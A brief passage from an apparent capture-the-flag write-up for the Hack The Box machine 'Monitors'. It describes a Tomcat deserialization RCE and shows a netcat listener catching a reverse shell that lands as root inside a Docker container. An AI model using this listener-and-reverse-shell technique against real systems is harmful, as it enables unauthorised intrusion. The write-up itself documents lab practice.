10 Apache Tomcat/9.0.31 deserialization RCE > docker root

Using https://github.com/iamkashz/ctf-scripts/blob/main/HTB/monitors-tomcat-deserialization-rce.sh

$ nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.238] 42564
bash: cannot set terminal process group (32): Inappropriate ioctl for device
bash: no job control in this shell
root@c0e88665f9ad:/usr/src/apache-ofbiz-17.12.01# whoami;id;hostname
root
uid=0(root) gid=0(root) groups=0(root)
c0e88665f9ad

# we are in docker container

Last updated